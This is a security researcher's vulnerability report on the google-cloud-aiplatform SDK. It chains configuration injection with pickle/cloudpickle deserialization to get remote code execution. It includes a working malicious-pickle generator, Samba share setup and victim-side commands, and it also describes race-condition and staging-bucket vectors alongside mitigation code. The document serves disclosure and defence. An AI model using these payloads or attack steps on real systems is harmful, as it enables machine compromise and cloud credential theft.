google-cloud-aiplatform - Version 1.147.0 / Remote Code Execution (RCE) via Insecure Deserialization (Bug Chaining)
The following documents the chaining of two distinct vulnerabilities: (1) Insecure Configuration Injection via AIP_STORAGE_URI or staging_bucket and (2) Insecure Deserialization via pickle/cloudpickle, whose technical impact results in Remote Code Execution (RCE) without requiring "self-injection" by the victim.
Below is one (1) way to reproduce RCE in google-cloud-aiplatform using an attacker-controlled SMB share, with no third party locally modifying the files that trigger code execution during deserialization.
For this PoC, two (2) different devices were used to simulate the interaction between an attacking machine (Raspberry Pi with IP 192.168.1.90) and a victim machine (Windows with IP 192.168.1.88).
Note: While this vulnerability is specifically verified and reported on version 1.147.0, other prior and subsequent versions may also be susceptible to this insecure deserialization vector.
Introduction
google-cloud-aiplatform (also known as python-aiplatform in its source repository) is the official Google Cloud Python SDK for Vertex AI. Vertex AI is Google Cloud's unified, enterprise-grade machine learning platform designed to help data scientists and ML engineers build, deploy, and scale machine learning models and AI applications.
The SDK is a critical component in modern MLOps pipelines, used to automate workflows, train custom models, manage datasets, and run agentic frameworks or reasoning engines. Because it handles the transfer and initialization of high-value AI models and pipeline configurations between local workstations, CI/CD environments, and Google Cloud, its integrity is fundamental to the security of the entire AI/ML supply chain.
Vulnerability Description
The SDK implements several sinks where serialized Python objects (models, agents, or reasoning engines) are loaded from remote locations. By providing a malicious URI (GCS or SMB/UNC), an attacker can force the SDK to download and deserialize an arbitrary payload.
The vulnerable code in google/cloud/aiplatform/prediction/sklearn/predictor.py:
62: prediction_utils.download_model_artifacts(artifacts_uri)
...
86: self._model = pickle.load(open(prediction.MODEL_FILENAME_PKL, "rb"))
In this flow, download_model_artifacts copies files from the attacker-controlled artifacts_uri (which supports SMB/UNC on Windows) to the local environment, and pickle.load immediately executes the payload.
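To make concrete why pickle.load amounts to code execution, the following is a minimal, harmless sketch of the mechanism. It is not taken from the SDK; the Demo class is hypothetical and the stored callable is the benign builtin sorted rather than a shell command.

```python
import pickle


class Demo:
    """Benign stand-in for a malicious object (hypothetical, illustration only)."""

    def __reduce__(self):
        # pickle records "call sorted([3, 1, 2])" instead of the object's state;
        # the unpickler performs that call itself while loading.
        return (sorted, ([3, 1, 2],))


blob = pickle.dumps(Demo())
result = pickle.loads(blob)  # the stored callable runs here, during load

# The caller receives the callable's return value, not a Demo instance.
print(type(result).__name__, result)
```

Whoever controls the bytes handed to the loader chooses both the callable and its arguments, which is why an attacker-supplied model.pkl is equivalent to attacker-supplied code.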
Technical Impact Analysis
Project Purpose & Context
google-cloud-aiplatform is the official Python SDK for Vertex AI, Google's unified machine learning platform. It is used by data scientists and ML engineers to orchestrate the entire ML lifecycle, from data preparation and training to model deployment and monitoring. The library handles high-value artifacts, including model weights and complex agentic logic, often involving the serialization of custom Python classes.
Platform & Deployment Environment
- MLOps Pipelines: CI/CD systems that automate model training and deployment.
- Data Science Workstations: Local environments (Windows/Linux) used for model development and testing.
- Vertex AI Managed Services: Backend environments where the SDK manages model serving and agent orchestration.
Comprehensive Risk Assessment
The vulnerability is rated as Critical. The ability to trigger RCE through network URIs completely bypasses the traditional "local-only" trust boundary of Pickle. In enterprise environments, this can lead to:
- GCP Credential Theft: Exfiltration of IAM tokens from a developer's workstation or a CI/CD runner.
- Supply Chain Attacks: Poisoning shared "Staging Buckets" to compromise all developers in a project.
- Lateral Movement: Pivoting from a compromised researcher's machine to the broader corporate VPC or Cloud project.
Attack Scenario
Who wants to exploit a particular vulnerability?
Adversaries targeting AI/ML research data, industrial competitors seeking to steal proprietary model architectures, or malicious actors aiming to hijack high-performance compute resources (TPUs/GPUs) or obtain sensitive Cloud service account keys.
For what gain?
Intellectual property theft (model architectures, datasets), financial gain via resource hijacking, or long-term persistence in a victim's Cloud infrastructure through credential exfiltration.
In what way?
Attackers can leverage several remote vectors:
- Staging Redirection: Social-engineering a developer into using an attacker-controlled staging_bucket for an "experiment".
- Artifact Poisoning: Overwriting remote .pkl files in a shared GCS bucket to trigger the TOCTOU race condition during a deployment validation.
- Collaborative Resource Sharing: Contributing a "malicious agent" to a public or internal hub that triggers RCE when a victim attempts a local evaluation or preview.
Reproduction Steps
On the Raspberry (attacker)
kw0@kw0l4b:~ $ hostname -I | awk '{print $1}'
192.168.1.90
kw0@kw0l4b:~ $
Shared Resource Configuration (SMB):
1. Install Samba:
sudo apt update && sudo apt install samba samba-common-bin -y
2. Prepare the attack directory:
mkdir ~/lab_attack
chmod 755 /home/kw0 # Allows Samba to access the HOME
chmod -R 777 ~/lab_attack
3. Configure Samba: Add to the end of /etc/samba/smb.conf:
[lab_share]
path = /home/kw0/lab_attack
read only = no
guest ok = yes
4. Payload Generation on the Raspberry:
Run the specialized exploit.py script to generate the model.pkl file directly in the shared path:
import pickle


class RCE:
    def __reduce__(self):
        # We use 'eval' and '__import__' to ensure universal execution.
        # This avoids module import errors (such as POSIX)
        # by not depending on the state of the local 'os' module during pickling.
        return (eval, ("__import__('os').system('calc.exe')",))


# Specify the path on the Raspberry Pi
with open('/home/kw0/lab_attack/model.pkl', 'wb') as f:
    pickle.dump(RCE(), f)
On Windows (victim)
PS L:\Pickle-RCE-Finder\PYPI-google-cloud-aiplatform> Get-NetIPAddress -AddressFamily IPv4 | Where-Object PrefixOrigin -eq "Dhcp" | Select-Object -ExpandProperty IPAddress
192.168.1.88
PS L:\Pickle-RCE-Finder\PYPI-google-cloud-aiplatform>
Technical Requirements
1. Create a Python environment:
python -m venv .venv
2. Activate the environment:
.venv\Scripts\activate
3. Install the SDK and its dependencies:
pip install "google-cloud-aiplatform[prediction]" scikit-learn joblib
Exploit Execution:
1. Set the SMB path as an environment variable:
$env:AIP_STORAGE_URI = "\\192.168.1.90\lab_share"
2. Launch deserialization:
python -c "import os; from google.cloud.aiplatform.prediction.sklearn.predictor import SklearnPredictor; predictor = SklearnPredictor(); path = os.environ.get('AIP_STORAGE_URI'); predictor.load(path)"
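For anyone reproducing this in a lab, a pre-flight check along the following lines would refuse the UNC path before it reaches the loader. This is only a sketch: is_unc_path and checked_artifact_uri are hypothetical helper names, not functions provided by the SDK.

```python
import os


def is_unc_path(uri: str) -> bool:
    """Return True if uri looks like a Windows UNC/SMB location."""
    # Treat forward slashes like backslashes so //host/share is caught too.
    normalized = uri.replace("/", "\\")
    return normalized.startswith("\\\\")


def checked_artifact_uri(env_var: str = "AIP_STORAGE_URI") -> str:
    """Read the artifact location from the environment, rejecting UNC paths."""
    uri = os.environ.get(env_var, "")
    if not uri:
        raise ValueError(f"{env_var} is not set")
    if is_unc_path(uri):
        raise ValueError(f"refusing UNC/SMB artifact location: {uri!r}")
    return uri
```

With AIP_STORAGE_URI set as in step 1, checked_artifact_uri() raises ValueError instead of returning the share path. A gs:// URI passes this particular check, so it does not by itself address the GCS-based vectors described next.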
Other RCE vectors in google-cloud-aiplatform remotely controlled by an attacker
Vector #1: GCS Round-Trip TOCTOU (Race Condition)
The SDK implements a pattern where objects are serialized to GCS and immediately read back for validation. This creates a Time-of-Check Time-of-Use (TOCTOU) vulnerability that can be exploited via the network.
File: vertexai/agent_engines/_agent_engines.py
Function: _upload_agent_engine()
Sink: cloudpickle.load(f) (Line 1224)
Attack Logic & Context Reversal
The SDK serializes the AgentEngine to a .pkl file in a GCS bucket (Line 1216) and then immediately opens a read stream to "validate" the upload (Line 1224). Since GCS is a networked object store and there is a window between the write and the read-back, an attacker with write access to the same staging bucket can race the SDK.
Exploit Scenario
- Initial Setup: Attacker deploys a monitoring script (or GCS-triggered Cloud Function) targeting the victim's staging_bucket.
- Interaction: The Victim (e.g., a Lead Data Scientist) runs AgentEngine.create(my_agent) to deploy a new agent.
- Execution:
  - SDK uploads reasoning_engine.pkl.
  - Attacker's script detects the new object and immediately overwrites it with a malicious payload.
  - SDK initiates the validation load(), pulling and executing the attacker's payload locally.
- Final Result: Full machine compromise of the Victim's environment with their GCP credentials.
- Lateral Movement: Attackers can pivot from a low-privileged researcher account (with bucket access) to an Admin/Owner account (performing the deployment).
- Supply Chain: Malicious templates can trigger this during the "getting started" phase.
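One way to close the race described above is to pin a digest of the bytes before upload and refuse to deserialize a read-back that does not match. The sketch below illustrates the idea under stated assumptions: FakeBucket is a hypothetical in-memory stand-in for the staging bucket, upload_and_validate is an illustrative name, and stdlib pickle is used in place of cloudpickle to keep the example self-contained. It is not the SDK's implementation.

```python
import hashlib
import pickle


class FakeBucket:
    """In-memory stand-in for a staging bucket (hypothetical)."""

    def __init__(self):
        self.objects = {}

    def upload(self, name: str, data: bytes) -> None:
        self.objects[name] = data

    def download(self, name: str) -> bytes:
        return self.objects[name]


def upload_and_validate(bucket, name: str, obj):
    """Upload obj, then load the read-back only if its bytes are unchanged."""
    payload = pickle.dumps(obj)
    expected = hashlib.sha256(payload).hexdigest()  # pinned before upload

    bucket.upload(name, payload)
    fetched = bucket.download(name)  # an attacker may have overwritten this

    if hashlib.sha256(fetched).hexdigest() != expected:
        raise RuntimeError("staged object changed after upload; refusing to load")
    return pickle.loads(fetched)
```

If the object is overwritten between the upload and the read-back, the digests differ and nothing is deserialized. Because a matching digest means the fetched bytes are the ones the caller just produced, the validation could equally be run on the local bytes without reading from the bucket at all.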
Vector #2: Staging Bucket Spec Injection
The SDK allows the redirection of all serialization artifacts to an arbitrary GCS URI, which is then used as a trusted source for local deserialization checks.
File: google/cloud/aiplatform/initializer.py
Function: vertexai.init()
Sink: cloudpickle.load (multiple locations via _prepare)
Controlled input: staging_bucket parameter.
Analysis & Impact
If a user is social-engineered into using an attacker-controlled staging bucket URI (e.g., gs://public-attacker-bucket/malicious-staging), any subsequent call to AgentEngine.create() or AgentEngine.update() will download and execute the attacker's payload during the SDK's internal verification phase.
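A caller-side guard against this redirection could check the staging URI against an explicit allow-list before handing it to the SDK. The following is a minimal sketch; validate_staging_bucket and the bucket name my-team-staging are hypothetical and chosen for illustration only.

```python
from urllib.parse import urlparse

# Hypothetical allow-list; a real deployment would load this from trusted config.
ALLOWED_STAGING_BUCKETS = frozenset({"my-team-staging"})


def validate_staging_bucket(uri: str, allowed=ALLOWED_STAGING_BUCKETS) -> str:
    """Return uri unchanged if it is a gs:// URI in an allow-listed bucket."""
    parsed = urlparse(uri)
    if parsed.scheme != "gs":
        raise ValueError(f"staging location must be a gs:// URI: {uri!r}")
    if parsed.netloc not in allowed:
        raise ValueError(f"bucket {parsed.netloc!r} is not allow-listed")
    return uri
```

Calling validate_staging_bucket("gs://public-attacker-bucket/malicious-staging") raises ValueError, while a URI inside an allow-listed bucket is returned unchanged. An allow-list does not help if the allow-listed bucket itself is writable by the attacker.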
Vector #3: Local Agent Run / Evaluation RCE
The SDK supports a "Local Agent Run" mode for evaluations, which materializes agent state from serialized artifacts.
File: _genai/_evals_common.py
Function: _execute_local_agent_run_with_retry()
Sink: cloudpickle.load
Controlled input: agent parameter in evaluation tasks.
Exploit Scenario
- Setup: Attacker contributes a "Reasoning Engine" or "Agent" to a shared hub or project.
- Trigger: Victim runs an evaluation job (e.g., eval_task.run(agent=malicious_agent_uri)).
- Impact: The evaluation runner attempts a "Local Agent Run" to benchmark performance. This triggers the download and load() of the agent's state, leading to RCE on the benchmarking machine.
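Where an artifact is expected to contain only plain data, a restricted unpickler can limit which globals a payload may reference, following the "Restricting Globals" pattern from the Python pickle documentation. The sketch below assumes a deliberately tiny allow-list; SAFE_GLOBALS and restricted_loads are illustrative names, and this is not something the SDK currently does.

```python
import io
import pickle

# Hypothetical allow-list of (module, name) pairs a payload may reference.
SAFE_GLOBALS = {
    ("builtins", "set"),
    ("builtins", "frozenset"),
    ("builtins", "complex"),
}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the pickle stream asks for a global (class/function).
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Like pickle.loads, but rejects any global outside SAFE_GLOBALS."""
    return RestrictedUnpickler(io.BytesIO(data)).load()
```

Plain containers such as {"w": [1.0, 2.0]} load normally, while a stream that references builtins.eval, os.system, or any other global outside the list fails with UnpicklingError before anything is called. Real scikit-learn models and cloudpickled agents reference many classes, so this approach is not a drop-in replacement for those sinks.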
Executive Summary: Insecure Deserialization via Bug Chaining in google-cloud-aiplatform
This research documents a critical RCE vulnerability chain in google-cloud-aiplatform (version 1.147.0) that combines insecure configuration injection with insecure deserialization.
- Root Cause: The SDK utilizes pickle/cloudpickle to load model artifacts and agents from remote locations (GCS or SMB/UNC paths) without proper validation.
- Exploitation Mechanism: By manipulating configuration parameters like AIP_STORAGE_URI or staging_bucket, an attacker can force the SDK to fetch and execute a malicious payload from an attacker-controlled remote server. This bypasses traditional "local-only" trust boundaries, as the tool treats these remote resources as trusted.
Analysis of Scope and Security Implications
This vulnerability is of critical severity because it transforms a standard SDK operation into an RCE vector that does not require the victim to manually inject malicious code.
1. Infection Scenarios
- Supply Chain & Staging Poisoning: Attackers can overwrite remote .pkl files in shared GCS buckets to exploit TOCTOU (Time-of-Check Time-of-Use) race conditions during deployment validations.
- Social Engineering: Developers can be coerced into using an attacker-controlled staging_bucket URI for "experiments," resulting in immediate code execution upon calling initialization functions like vertexai.init().
- Collaborative Hub Poisoning: By contributing a "malicious agent" to a shared hub, an attacker can compromise any user who attempts to locally evaluate or preview that agent, as the SDK triggers cloudpickle.load during evaluation.
2. Factors Exacerbating Risk
- Cloud Credential Theft: Successful exploitation allows for the exfiltration of IAM tokens and sensitive Cloud service account keys from the victim's workstation or CI/CD pipeline.
- Lateral Movement: The vulnerability facilitates pivoting from a compromised research workstation to broader corporate VPCs or internal Cloud projects.
- Resource Hijacking: Attackers can gain control over high-performance compute resources (TPUs/GPUs) managed by the victim's Cloud infrastructure.
Conclusion and Recommendation
This is a critical-severity vulnerability. The chaining of configuration injection with insecure deserialization sinks renders the SDK a potent vector for environment compromise.
Suggested actions for the development team:
- Restrict Deserialization: Replace pickle/cloudpickle with secure, non-executable serialization formats (e.g., JSON or Protobuf) for loading model configurations and agents.
- Path Validation: Implement strict allow-listing for artifacts_uri and staging_bucket paths to prevent the resolution of UNC/SMB shares or untrusted GCS buckets.
- Remove Implicit Trust: Treat all data fetched from networked storage (GCS/SMB) as untrusted and verify signatures before any deserialization process.
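The "verify signatures before any deserialization" recommendation can be sketched with an HMAC over the serialized bytes. This is a minimal illustration, assuming a secret key that is shared out of band and never stored alongside the artifact; sign and verified_loads are hypothetical names and not part of the SDK.

```python
import hashlib
import hmac
import pickle


def sign(data: bytes, key: bytes) -> bytes:
    """Return an HMAC-SHA256 tag over the serialized artifact."""
    return hmac.new(key, data, hashlib.sha256).digest()


def verified_loads(data: bytes, signature: bytes, key: bytes):
    """Deserialize data only if its tag matches; otherwise raise."""
    # compare_digest runs in constant time, avoiding a timing side channel.
    if not hmac.compare_digest(sign(data, key), signature):
        raise ValueError("artifact signature mismatch; refusing to deserialize")
    return pickle.loads(data)
```

The producer stores sign(blob, key) next to the artifact, and the consumer calls verified_loads(blob, tag, key). An attacker who can overwrite the artifact but does not hold the key cannot produce a matching tag, so the payload is rejected before pickle ever parses it.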